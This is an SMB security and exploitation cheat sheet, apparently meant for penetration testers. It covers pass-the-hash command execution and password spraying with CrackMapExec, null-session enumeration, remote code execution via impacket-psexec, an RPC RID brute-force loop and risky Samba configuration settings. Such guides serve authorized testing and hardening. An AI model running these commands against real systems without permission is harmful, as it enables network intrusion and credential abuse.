SMB

SMB Security & Exploitation Guide

1. About SMB

Server Message Block (SMB) is a client server protocol that provides shared access to:

• Files and directories

• Printers

• Routers and interfaces

It enables communication between nodes in the same network, granting access to resources based on authentication and permissions.

Default Ports:

• NetBIOS over TCP: 137, 138, 139

• Direct SMB (CIFS): 445

---

2. Tools for SMB Interaction

CrackMapExec (CME)

A powerful tool for SMB enumeration and exploitation.

• Pass-the-Hash or Command Execution:

  crackmapexec smb 192.0.2.10 -u Administrator -d . -H <NTLM_HASH> -x whoami

• Null-session login and share enumeration:

  crackmapexec smb 203.0.113.5 -u '' -p '' --shares

• Userlist checking:

  crackmapexec smb 198.51.100.20 -u users.txt -p '' -d . --continue-on-success

• User=Password spray attack:

  crackmapexec smb 198.51.100.20 -u users.txt -d . --no-bruteforce --continue-on-success

---

Samba

An open-source implementation of SMB/CIFS on Unix-based systems.

• Configuration file: /etc/samba/smb.conf

• Check active connections:

  smbstatus

• Inspect config (excluding comments):

  cat /etc/samba/smb.conf | grep -v "#\|\;"

---

smbclient

A command-line tool to interact with SMB shares.

• List available shares (null session):

  smbclient -N -L //192.0.2.10

• Connect to a share:

  smbclient -U username \\\\192.0.2.10\\share

• Useful commands:

  • help → show available commands

  • ls → list files

  • get <file> → download a file

  • !<cmd> → run local system command

---

SMBMap

Automation tool for SMB enumeration and file operations.

• Basic enum:

  smbmap -H 192.0.2.10

• Recursive enum:

  smbmap -H 192.0.2.10 -r share

• Download a file:

  smbmap -H 192.0.2.10 --download "share/example.txt"

• Upload a file:

  smbmap -H 192.0.2.10 --upload example.txt "share/example.txt"

---

Impacket Tools

Impacket provides Python scripts for SMB interaction and exploitation.

• SMB client:

  impacket-smbclient 'rio@corp.local' -no-pass

• Run SMB server:

  sudo impacket-smbserver share ./ -smb2support

• Remote code execution:

  impacket-psexec administrator:'mypass@123'@192.0.2.10

  (Same applies for smbexec and atexec.)

---

RPCclient

RPC (Remote Procedure Call) allows process-to-process communication across systems.

• Connect (null session):

  rpcclient -U "" 192.0.2.10

• Invoke commands:

  rpcclient $> enumdomusers
  rpcclient $> queryuser <RID>

• RID Brute Force (users/groups enumeration):

  for i in $(seq 500 1100); do \
  rpcclient -N -U "" 192.0.2.10 -c "queryuser 0x$(printf '%x\n' $i)" \
  | grep "User Name\|user_rid\|group_rid" && echo ""; done

Alternative: use samrdump.py, enum4linux, or enum4linux-ng:

./enum4linux-ng.py 192.0.2.10 -A

---

Windows Net Command

net use \\DC01\ipc$ "" /u:""

---

3. Dangerous SMB Configuration Settings

• browseable = yes → Shares are visible in network browsing.

• read only = no → Users can create and modify files.

• writable = yes → Full write permissions allowed.

• guest ok = yes → Anonymous logins permitted.

• enable privileges = yes → Honors user privileges (may be abused).

• create mask = 0777 → New files created with world read/write permissions.

• directory mask = 0777 → New directories created with world read/write permissions.

• logon script = script.sh → Executes script at user login.

• magic script = script.sh / magic output = script.out → Dangerous auto-execution functionality.

---

4. Creating a Share (Windows 10 Example)

1. Create a folder.

2. Use Advanced Sharing to share the folder.

3. Configure both SMB share permissions and NTFS permissions.

   • SMB permissions control network access.

   • NTFS permissions control file system access.

4. Inherited permissions are marked grey (from parent directory).

---

5. Mounting SMB Shares (Linux)

sudo mount -t cifs -o username=rio,password=rio@123 //192.0.2.10/Sharename /home/user/Desktop/